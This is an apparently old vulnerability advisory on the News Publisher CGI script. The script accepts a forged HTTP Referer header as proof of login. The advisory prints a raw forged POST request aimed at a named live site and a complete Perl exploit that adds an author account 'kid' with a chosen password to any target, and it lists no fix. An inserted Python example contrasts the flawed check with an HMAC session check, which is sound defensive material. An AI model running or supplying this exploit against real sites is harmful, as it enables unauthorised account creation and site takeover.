COMMAND
News Publisher
SYSTEMS AFFECTED
News Publisher CGI
PROBLEM
'n30' found the following. Yet again a CGI author uses nested IF
statements to decide what action to take on an incoming request.
This time the problem allows anyone to add an author to the
'authors.file' file. This can't be done through a web browser alone,
since the script assumes that if the HTTP_REFERER field is the URL
of the news.cgi script (the main script) then you must have
completed the login process. That assumption would hold if you were
using a browser, but the Referer header is supplied by the client
and is trivially forged with netcat. Passing this raw HTTP request
(note the empty line separating the headers from the form body, and
that Content-length is the exact byte count of that body):
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71

author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot
makes it possible to add an author.
Below is a Perl script that will add a user to the authors.file
for you with username 'kid' and the password of your choice.
This is a real problem: on older versions the authors.file was
readable and held Unix crypt() password hashes, which at least had
to be cracked; this hole removes even that step, since an attacker
simply creates an author account of his own. There are many sites
using this script and some would probably be regarded as large.
Therefore do NOT misuse the exploit script!!!
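To make the flaw concrete, here is an added Python example (not News Publisher's own Perl code, and not part of the original advisory) that puts the Referer-based check the advisory describes next to a hardened replacement. The vulnerable path trusts HTTP_REFERER, which the client controls, so the forged request from above is accepted; the hardened path ignores Referer and requires a server-side session whose cookie value is authenticated with an HMAC. The script URL, the session cookie name, the form field names and the constructed request environment are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Hypothetical script URL standing in for the target site in the advisory.
NEWS_CGI_URL = "http://www.example.com/cgi-bin/news/news.cgi"


def referer_says_logged_in(environ):
    """The check the advisory describes: a matching HTTP_REFERER is taken
    as proof that the login step was completed. Any client can set it."""
    return environ.get("HTTP_REFERER", "") == NEWS_CGI_URL


# Hardened replacement: a server-side session table keyed by a random id.
# The cookie carries the id plus an HMAC tag, so a tampered cookie is
# rejected before the table is consulted. Per-process key (assumption).
_SESSION_KEY = secrets.token_bytes(32)
_SESSIONS = {}  # session id -> logged-in author name


def _tag(sid):
    return hmac.new(_SESSION_KEY, sid.encode(), hashlib.sha256).hexdigest()


def issue_session(user):
    """Called only after a real password check; returns a Set-Cookie value."""
    sid = secrets.token_urlsafe(16)
    _SESSIONS[sid] = user
    return f"sess={sid}.{_tag(sid)}; HttpOnly; Path=/cgi-bin/news/"


def session_user(environ):
    """Return the logged-in user for this request, or None."""
    cookies = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    if "sess" not in cookies:
        return None
    sid, _, tag = cookies["sess"].value.partition(".")
    if not hmac.compare_digest(tag, _tag(sid)):
        return None
    return _SESSIONS.get(sid)


def add_author_vulnerable(environ, form, authors):
    """addAuthor as the advisory describes it: gated on Referer only."""
    if not referer_says_logged_in(environ):
        return False
    authors[form["author"]] = form["apassword"]
    return True


def add_author_hardened(environ, form, authors):
    """addAuthor gated on a valid session; Referer plays no part."""
    if session_user(environ) is None:
        return False
    authors[form["author"]] = form["apassword"]
    return True


# Constructed CGI environment and form, mirroring the forged netcat request.
FORGED_ENV = {
    "REQUEST_METHOD": "POST",
    "QUERY_STRING": "addAuthor",
    "HTTP_REFERER": NEWS_CGI_URL,
    "HTTP_USER_AGENT": "n30/browser",
}
FORGED_FORM = {"author": "n30", "apassword": "teapot", "email": "don@know.com",
               "name": "n30", "password": "teapot"}


def demo():
    """Run the forged request through both checks.

    Returns (accepted_by_vulnerable, accepted_by_hardened, accepted_with_real_session)."""
    vuln = add_author_vulnerable(FORGED_ENV, FORGED_FORM, {})
    hard = add_author_hardened(FORGED_ENV, FORGED_FORM, {})
    # A genuine session (cookie issued after login) still passes the hardened check.
    cookie = issue_session("admin").split(";")[0]
    real_env = dict(FORGED_ENV, HTTP_COOKIE=cookie)
    real = add_author_hardened(real_env, FORGED_FORM, {})
    return vuln, hard, real


if __name__ == "__main__":
    print(demo())  # (True, False, True)
```

The same rule applies to any other action in the script that is "protected" by Referer: authorisation has to come from state the server created and can verify, never from a request header.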
#!/usr/bin/perl
#
# News Publisher EXPLOIT by n30
# Versions: tested on 1.05, 1.05a, 1.05b, 1.06
# Bug Found By: me {n30}
# OS: Unix and WinNT
#
# The Problem:
# The author decided in all his 'enlightened wisdom' that if the
# HTTP_REFERER URL is the same as the News Publisher news.cgi file,
# then you have OBVIOUSLY logged in?
#
# Exploit:
# hmmm me thinks i should change the HTTP_REFERER to:
#
# http://www.server.com/cgi/news.cgi
#
# Using this exploit will add an author account with user kid
# and password of your choice.
#
# NOTE: There are more inventive ways to use this vulnerability :)
# ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
#
# n30@alldas.de
# www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
#
# Shoutz: trib, axess, domz, acidflame, raxie, and all who know me!
#
use strict;
use warnings;
use Socket;

print("\nNews Publisher EXPLOIT\n");
print("By: n30 {n30\@alldas.de}\n");
print("\nShoutz: trib, axess, domz, acidflame, raxie\n");

if (@ARGV < 3) {
    print("\nUsage: $0 <target> <dir> <newpass>\n");
    print("\n eg => ./sploit.pl www.example.com cgi-bin/news.cgi iisalamer\n");
    exit(1);
}
my ($target, $dir, $newpass) = @ARGV;

# Form body: the author record that addAuthor appends to authors.file.
my $url = "author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&password=$newpass";

# Content-Length must be the exact byte length of the body. (The original
# hard-coded 68 + 2 * length($newpass), which is the same number; computing
# it from the body keeps it right if the fields are ever changed.)
my $length = length($url);

print("\nRemote host: $target\n");
print("CGI-script: $dir\n");
print("URL: http://$target/$dir\n");
print("URL Command: $url\n");

# Necessary to DE-Kiddie da werld :)
my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";

# Raw request with CRLF line endings and the mandatory empty line between
# headers and body. The forged Referer is the whole trick: news.cgi takes it
# as proof that the login step was completed.
my $crlf = "\015\012";
my $sploit = join($crlf,
    "POST /$dir?addAuthor HTTP/1.0",
    "Connection: close",
    "User-Agent: $agent",
    "Host: $target",
    "Referer: http://$target/$dir",
    "Content-type: application/x-www-form-urlencoded",
    "Content-length: $length",
    "",
    $url);

my $iaddr = inet_aton($target) || die("Error: cannot resolve $target\n");
my $paddr = sockaddr_in(80, $iaddr);
my $proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET, $sploit, 0) || die("Error: $!\n");

# Print the server's reply so the outcome of the addAuthor request can be seen.
while (my $line = <SOCKET>) {
    print $line;
}
close(SOCKET);

print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");
exit(0);
SOLUTION
Nothing yet.